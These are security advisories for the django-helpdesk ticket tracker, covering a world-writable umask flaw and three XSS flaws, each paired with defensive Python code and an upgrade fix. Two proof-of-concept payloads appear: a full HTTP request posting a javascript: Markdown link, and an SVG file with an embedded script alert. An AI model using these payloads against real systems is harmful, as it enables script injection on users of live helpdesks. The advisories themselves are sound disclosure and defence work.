Insecure Inherited Permissions
django-helpdesk is a Django-powered ticket tracker for your helpdesk.
Affected versions of this package are vulnerable to Insecure Inherited Permissions because models.py calls os.umask(0). The umask is process-wide and persists after the call, so every file and directory the application creates afterwards receives the full mode requested by the creating call (typically 0o666 for files and 0o777 for directories), making them readable and writable by every account on the host. An attacker with local access can read or modify that data without passing through the application's authorization checks.
How to fix Insecure Inherited Permissions? Upgrade django-helpdesk to version 1.0.0 or higher.
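The effect described above can be measured directly. The following stand-alone script (an added illustration, not django-helpdesk code) creates a directory and a file under a chosen umask and returns the permission bits that result; umask 0 yields world-writable objects, while a conventional 0o022 or a strict 0o077 does not. The attachment-like names and the 0o022 and 0o077 values are assumptions chosen for the demonstration.

```python
import os
import stat
import tempfile


def modes_under_umask(umask_value):
    """Create a directory and a file while `umask_value` is in effect and
    return (dir_mode, file_mode) as permission bits.

    The previous process umask is restored on exit, because os.umask() is a
    process-wide setting: a value set once in module code (as in the advisory)
    stays in force for every later file operation in that worker.
    Illustrative code, not taken from django-helpdesk.
    """
    previous = os.umask(umask_value)
    try:
        with tempfile.TemporaryDirectory() as base:
            # Names are assumptions standing in for an upload directory and a saved file.
            attach_dir = os.path.join(base, "attachments")
            os.makedirs(attach_dir)  # requested mode 0o777, reduced by the umask
            ticket_file = os.path.join(attach_dir, "ticket.txt")
            fd = os.open(ticket_file, os.O_CREAT | os.O_WRONLY, 0o666)  # requested 0o666
            os.close(fd)
            return (
                stat.S_IMODE(os.stat(attach_dir).st_mode),
                stat.S_IMODE(os.stat(ticket_file).st_mode),
            )
    finally:
        os.umask(previous)


def is_world_writable(mode):
    """True if the 'other' write bit is set in the given permission bits."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for value in (0, 0o022, 0o077):
        dir_mode, file_mode = modes_under_umask(value)
        print(f"umask {value:04o}: dir {dir_mode:04o} file {file_mode:04o} "
              f"world-writable={is_world_writable(file_mode)}")
```

Run on a POSIX system; Windows does not honour the umask in the same way. The check is a quick way to confirm, on a deployed host, whether an application's upload directory is being created with a permissive mask.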
Cross-site Scripting (XSS)
django-helpdesk is a Django-powered ticket tracker for your helpdesk.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Markdown in the Description or Comment field of a ticket. When the field is rendered from Markdown to HTML, the application does not validate the properties of the generated elements (such as link targets), so a Markdown link whose target is a javascript: URL survives rendering and executes in the helpdesk's origin when a user clicks it.
PoC
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"
o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"
1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"
XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"
[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"
3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"
xss@test.com
-----------------------------69350364819088505273728279714--
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.2 or higher.
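The link in the PoC above works because the rendered <a href> is emitted without a check on its scheme. The following stand-alone Python (an added example, not django-helpdesk's code or its actual fix) shows the check a renderer needs: it normalises an href the way a browser does (entity-decoding, stripping control characters and whitespace, lowercasing) before comparing the scheme against an allowlist, and it rewrites the URL-bearing attributes in rendered HTML with the standard library's HTMLParser. The allowed scheme set and the choice of "#" as the replacement value are assumptions for this example.

```python
import html
import re
from html.parser import HTMLParser

# Schemes a ticket body may legitimately link to (assumption for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Attributes whose value is navigated to or fetched by the browser.
URL_ATTRIBUTES = {"href", "src", "action", "formaction"}

# Browsers drop ASCII control characters and whitespace inside a scheme, so
# "java\tscript:" and " javascript:" both execute; strip them before checking.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"[a-z][a-z0-9+.\-]*")


def is_safe_href(href):
    """Return True if href is relative or uses an allowed scheme."""
    if href is None:
        return True
    value = _CONTROL_WS.sub("", html.unescape(href)).lower()
    if ":" not in value:
        return True  # relative URL, fragment or query
    scheme = value.split(":", 1)[0]
    if not _SCHEME.fullmatch(scheme):
        return True  # text before the colon is not a valid scheme, so it is a relative path
    return scheme in ALLOWED_SCHEMES


class LinkSanitizer(HTMLParser):
    """Rebuilds the HTML it is fed, neutralising unsafe URL attribute values.

    HTMLParser hands attribute values back already entity-decoded, so they
    are re-escaped on output. Comments are dropped on purpose.
    """

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []

    def _attrs(self, attrs):
        parts = []
        for name, value in attrs:
            if name.lower() in URL_ATTRIBUTES and not is_safe_href(value):
                value = "#"  # replacement target is an assumption for this example
            if value is None:
                parts.append(f" {name}")
            else:
                parts.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(parts)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)} />")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_links(rendered_html):
    """Return rendered_html with every unsafe href/src/action replaced."""
    parser = LinkSanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample: what the PoC's Markdown body renders to.
    sample = '<p><a href="javascript:alert(`document.domain`)">XSS</a></p>'
    print(sanitize_links(sample))
```

This covers the link vector shown in the PoC; it does not strip dangerous tags or event-handler attributes, so a renderer that accepts arbitrary user Markdown still needs a full tag and attribute allowlist. With the bleach library that is bleach.clean() with its tags, attributes and protocols arguments, which applies the same scheme allowlist idea to href and src.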
Cross-site Scripting (XSS)
django-helpdesk is a Django-powered ticket tracker for your helpdesk.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via uploaded attachments in .svg or .html format. Such a file is stored and served back from the application's origin as a document the browser renders, so the script it contains executes in that origin when a user opens the attachment.
PoC
// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.
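Whatever the upload form accepts, the attachment endpoint decides whether the browser renders the file or downloads it. The following stand-alone Python (an added example, not django-helpdesk's code or its actual fix) builds the response headers for serving an attachment: everything is sent as an attachment with nosniff and a sandboxing CSP, and content that is active by extension or by sniffing its first bytes (the uploader controls both the name and the body) is additionally forced to application/octet-stream. The extension list, the sniffed markers and the header values are assumptions for this example; the sample SVG is a constructed copy of the PoC above.

```python
import mimetypes
import os
import re

# Extensions a browser renders as a document that can run script (assumption:
# each is treated as active content regardless of the declared type).
ACTIVE_EXTENSIONS = {".svg", ".svgz", ".html", ".htm", ".xhtml", ".xml", ".xsl", ".shtml", ".mhtml"}

# Markers sniffed from the start of the body, so renaming PoC.svg to photo.png
# does not help the attacker.
_ACTIVE_MARKERS = re.compile(
    rb"<\s*(svg|html|script|body|iframe|object|embed|!doctype\s+html)\b",
    re.IGNORECASE,
)

# Constructed sample of the PoC.svg from the advisory (not read from disk).
POC_SVG = (
    b'<?xml version="1.0" standalone="no"?>\n'
    b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">'
    b'<script type="text/javascript">alert("XSS");</script></svg>'
)


def is_active_content(filename, head):
    """True if the upload must never be rendered inline, judged by its
    extension and by the first 4 KiB of its bytes."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ACTIVE_EXTENSIONS or bool(_ACTIVE_MARKERS.search(head[:4096]))


def safe_download_name(filename):
    """Reduce a user-supplied name to a single path component of safe characters."""
    base = os.path.basename(filename.replace("\\", "/"))
    return re.sub(r"[^A-Za-z0-9._-]", "_", base).strip("._") or "attachment"


def attachment_response_headers(filename, head):
    """Headers for serving a helpdesk attachment (values are this example's choices).

    - Content-Disposition: attachment makes the browser download rather than render.
    - X-Content-Type-Options: nosniff stops the browser second-guessing the type.
    - CSP 'sandbox' with no allow-* keywords disables script if the file is
      ever rendered anyway (for instance via a direct navigation).
    """
    name = safe_download_name(filename)
    headers = {
        "Content-Disposition": f'attachment; filename="{name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    if is_active_content(filename, head):
        headers["Content-Type"] = "application/octet-stream"
    else:
        guessed, _ = mimetypes.guess_type(name)
        headers["Content-Type"] = guessed or "application/octet-stream"
    return headers


if __name__ == "__main__":
    for name, body in (("PoC.svg", POC_SVG), ("photo.png", POC_SVG), ("photo.png", b"\x89PNG\r\n\x1a\n")):
        print(name, attachment_response_headers(name, body))
```

In a Django view the same outcome comes from FileResponse(..., as_attachment=True) combined with SECURE_CONTENT_TYPE_NOSNIFF and a CSP header; serving user uploads from a separate origin (a dedicated attachments host or bucket) removes the remaining risk of any rendered file running in the helpdesk's origin.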
Cross-site Scripting (XSS)
django-helpdesk is a Django-powered ticket tracker for your helpdesk.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) because the title of a newly created ticket is not sanitized, so HTML or script placed in the title executes for users who view the ticket.
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.